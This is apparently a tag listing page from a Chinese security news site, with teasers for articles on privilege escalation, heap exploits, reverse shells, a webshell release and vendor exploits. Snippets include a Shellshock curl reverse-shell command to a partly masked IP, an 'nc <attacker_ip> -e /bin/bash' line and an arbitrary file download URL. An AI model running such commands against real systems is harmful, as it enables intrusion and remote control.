bin - 第 12 | CN-SEC 中文网

程序逆向

脱壳后修复>fart脱壳后修复

用过fart的大佬都知道，拖出来的dex文件一般是需要修复一下的... 最近遇到一个apk需要脱壳，直接使用大神编译好的镜像刷入手机，脱壳一切顺利，上网搜了几个fart.py修复... 拖进jadx，...

11月26日10 views评论

阅读全文

安全文章

Linux提权姿势一：滥用SUDO提权

在渗透中，我们拿到的webshell和反弹回来的shell权限可能都不高，如果我们可以使用sudo命令访问某些程序，则我们可以使用sudo可以提权。在这里，我们可以通过调用一些二进制文件，这些文件可以...

09月24日340 views评论

阅读全文

逆向工程

PWN：UnsortedBin Attack

Unsorted Bin双向循环链表，先进先出，以下几种情况会分到 unsorted bin 中1、当一个较大的 chunk 被分割成两半后，如果剩下的部分大于 MINSIZE，就会被放到 unsor...

08月27日316 views评论

阅读全文

安全文章

【Vulnhub】Play XML Entities

给了一个 iso 文件，打开就是登录的状态，可以直接 ifconfig 去看 ip 地址访问一下 ippython3 -m http.server 8080python 开一个临时的服务，在提交表单的...

08月18日328 views评论

阅读全文

漏洞时代

中新金盾抗拒绝服务系统GetShell漏洞

任意文件下载漏洞：https://1.1.1.1:28XX3/cgi-bin/index.php?t=service&c=download&filepath=/et...

01月01日510 views评论

阅读全文

IBM AIX High Availability Cluster Multiprocessing (HACMP) Local Privilege Escalation 0day

少见的AIX的权限提升References: https://en.wikipedia.org/wiki/IBM_High_Availability_Cluster_Multipr...

01月01日漏洞时代430 views评论

阅读全文

moonsec_com

AspxSpy2014 Final

AspxSpy2014Final.rar 解压码： www.moonsec.com 说明受bin牛委托修改并发布，版权归bin牛所有。 Bug/建议提交：zcgonvh@root...

11月21日449 views评论

阅读全文

CVE-2014-6271反弹shell

curl -A "() { :;}; /bin/bash -i >& /dev/tcp/61.51.xx.xx/8080 0>&1" http...

11月21日moonsec_com439 views评论

阅读全文

linux下反弹Shell的五种方法

1. nc <attacker_ip> <port> -e /bin/bash 2. mknod backpipe p;...

11月21日moonsec_com477 views评论

阅读全文

gb2312_chinese_ci和gbk_chinese_ci以及gb2312_bin,gbk_bin的区别

gb2312_BIN :而gb2312_bin可以说是gb2312_chinese_ci的一个子集，而且gb2312_BIN是二进制存储....

11月21日moonsec_com533 views评论

阅读全文

各种环境下反弹 shell 的方法

注意这个是由解析shell的bash完成，所以某些情况下不支持。我用zsh不能反弹。这个也是最常用的。

05月19日颓废's Blog494 views评论

阅读全文

颓废's Blog

大华未授权访问漏洞exp

#!/usr/bin/python2.7 # Dahua backdoor Generation 2 and 3 # Author: bashis <mcw noemail eu> Mar...

05月19日3,812 views评论

阅读全文

脱壳后修复>fart脱壳后修复

Linux提权姿势一：滥用SUDO提权

PWN：UnsortedBin Attack

【Vulnhub】Play XML Entities

中新金盾抗拒绝服务系统GetShell漏洞

IBM AIX High Availability Cluster Multiprocessing (HACMP) Local Privilege Escalation 0day

AspxSpy2014 Final

CVE-2014-6271反弹shell

linux下反弹Shell的五种方法

gb2312_chinese_ci和gbk_chinese_ci以及gb2312_bin,gbk_bin的区别

各种环境下反弹 shell 的方法

大华未授权访问漏洞exp

在线咨询

微信